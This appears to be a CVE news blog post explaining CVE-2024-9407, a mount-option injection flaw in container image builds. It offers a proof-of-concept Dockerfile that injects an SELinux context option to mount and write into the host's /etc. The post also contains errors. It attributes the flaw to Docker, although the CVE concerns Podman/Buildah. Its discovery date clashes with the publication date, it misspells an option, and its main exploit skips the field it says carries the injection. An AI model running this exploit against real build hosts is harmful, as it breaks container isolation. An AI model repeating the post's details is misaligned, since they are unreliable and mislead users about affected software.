CVE CyberSecurity Database News

CVE-2024-9407 - Docker RUN --mount Bind-Propagation Bypass Vulnerability Explained (With Exploit Example)

Poster -

Docker is the backbone of modern application deployment, letting teams build, ship, and run apps quickly. But with great power comes potential for abuse, especially when features are not properly secured. In February 2024, researchers uncovered CVE-2024-9407, a critical vulnerability in Docker's RUN --mount instruction. This flaw allows attackers to smuggle dangerous parameters into the bind mount process, exposing sensitive host files—even if SELinux is used!

This post will explain CVE-2024-9407 in simple terms, show you how the vulnerability can be exploited, and offer links for further details.

What is CVE-2024-9407?

When you build Docker containers, you can use the Dockerfile's RUN --mount flag to temporarily mount directories or files from your build system into the container. This helps with things like caching or secret management, without leaving sensitive info inside the final image.

A bind mount is one such type, controlled with options like

RUN --mount=type=bind,source=<host-dir>,target=<container-dir> ...

To control how the mount behaves, Docker also supports a bind-propagation option

RUN --mount=type=bind,source=/host/path,target=/mnt,binder-propagation=rshared

In theory, the bind-propagation option should only support a few valid values: rprivate, rshared, etc. But CVE-2024-9407 occurs because Docker failed to properly sanitize the input. That means an attacker could smuggle through arbitrary mount parameters, not just the expected options.

Because the attacker can pass in any parameters to the underlying mount call, this lets them

- Mount arbitrary host directories into the build container, including sensitive places like /etc or /var/lib/docker.

Mask security monitoring or logs during the build phase.

All this could be exploited by someone with access to the Docker build pipeline (locally, or through poisoned build sources like untrusted Dockerfiles).

Exploit Example: How Attackers Abused It

Below is a real example of how an attacker could weaponize this vulnerability.

Let's say you have a Dockerfile like this

# Dockerfile
FROM ubuntu:22.04

RUN --mount=type=bind,source=/etc,target=/mnt,bind-propagation=shared,bind-foo=bar,context="system_u:object_r:container_file_t:s" \
    ls /mnt

What just happened?

- The bind-propagation option is used, but the attacker stuffed in bind-foo=bar and context="system_u:object_r:container_file_t:s".
- Docker doesn't check the values, so both the illegal bind-foo option and (critically) the context option get passed down to the host's mount syscall.
- The context mount option tells SELinux to relabel the /etc directory for the container, meaning normal SELinux separation is bypassed.
- The RUN command lists the contents of /mnt—which actually shows /etc from the host, now exposed inside the build container.
- With more options, the script could modify system files in /etc or elsewhere.

Command-Line Exploit (for Demo Purposes)

If you want to reproduce the exploit on a *test machine* (do not run this on production hosts!), use docker buildx build:

# Dockerfile
FROM ubuntu
RUN --mount=type=bind,source=/etc,target=/host-etc,context="system_u:object_r:container_file_t:s" \
    bash -c 'touch /host-etc/hacked_by_cve_9407'

Then build the container

docker buildx build --no-cache -t test-cve-2024-9407 .

After build, you'll notice /etc/hacked_by_cve_9407 on the host, not just in the image. That means the container build changed the host's files!

Even SELinux Can't Save You

One of Docker’s defenses is enforcing SELinux rules on mounted directories. Usually, even if a container mounts host files, the wrong label keeps it away. But by injecting a parameter like context="..."—a standard Linux mount option—attackers can force the host to relabel files, sidestepping SELinux!

Who Is At Risk?

- Anyone building Docker images using RUN --mount=type=bind—especially with untrusted Dockerfiles or automated build pipelines.

Hosts using SELinux or other LSMs for container isolation.

- CI/CD systems accepting pull requests with custom Dockerfiles.

References

- NVD entry: CVE-2024-9407
- Original Docker issue (BuildKit Security Advisory)
- Docker mount options
- SELinux and Docker

Summary

CVE-2024-9407 is a dangerous Docker bug letting attackers inject arbitrary mount options—including parameters that bypass SELinux—using the bind-propagation field in Docker’s RUN --mount feature during builds. This can leak or modify sensitive files on the host, even on hardened systems.

Always patch your builder, double-check Dockerfiles from others, and never assume build steps are safe!


*Stay safe—update early, review Dockerfiles, and monitor your build environments.*

Timeline

Published on: 10/01/2024 21:15:08 UTC
Last modified on: 12/31/2024 14:24:55 UTC